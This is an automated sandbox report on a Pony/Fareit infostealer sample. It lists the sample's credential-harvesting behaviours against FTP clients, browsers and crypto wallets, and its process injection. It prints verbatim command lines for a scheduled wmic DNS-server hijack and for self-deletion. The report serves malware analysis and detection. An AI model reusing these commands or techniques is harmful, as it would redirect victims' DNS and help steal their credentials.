Analysis Overview
SHA256
63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a
Threat Level: Known bad
The file 63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a was found to be: Known bad.
Malicious Activity Summary
Pony,Fareit
UPX packed file
Reads data files stored by FTP clients
Checks computer location settings
Reads user/profile data of web browsers
Deletes itself
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-11-19 03:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-11-19 03:28
Reported
2022-11-19 03:30
Platform
win7-20220901-en
Max time kernel
71s
Max time network
59s
Command Line
Signatures
Pony,Fareit
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1768 set thread context of 1284 | N/A | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\calc2.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c at 03:32:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\at.exe
at 03:32:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | selaqty.pw | udp |
| N/A | 8.8.8.8:53 | kdotojk.pw | udp |
| N/A | 8.8.8.8:53 | vodiklas.pw | udp |
Files
memory/1284-54-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-55-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-56-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1768-58-0x00000000000E0000-0x00000000000EC000-memory.dmp
memory/1284-60-0x0000000075931000-0x0000000075933000-memory.dmp
memory/1284-61-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-62-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-63-0x0000000000400000-0x000000000041C000-memory.dmp
memory/584-64-0x0000000000000000-mapping.dmp
memory/1428-65-0x0000000000000000-mapping.dmp
memory/520-67-0x0000000000000000-mapping.dmp
memory/1284-68-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1512-69-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-11-19 03:28
Reported
2022-11-19 03:32
Platform
win10v2004-20221111-en
Max time kernel
226s
Max time network
240s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2672 set thread context of 4568 | N/A | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 80
Network
| Country | Destination | Domain | Proto |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 13.89.178.26:443 | tcp | |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 209.197.3.8:80 | tcp | |
| N/A | 20.190.159.4:443 | tcp | |
| N/A | 20.190.159.71:443 | tcp | |
| N/A | 8.8.8.8:53 | 226.101.242.52.in-addr.arpa | udp |
Files
memory/4568-132-0x0000000000000000-mapping.dmp
memory/2672-134-0x00000000029A0000-0x00000000029AC000-memory.dmp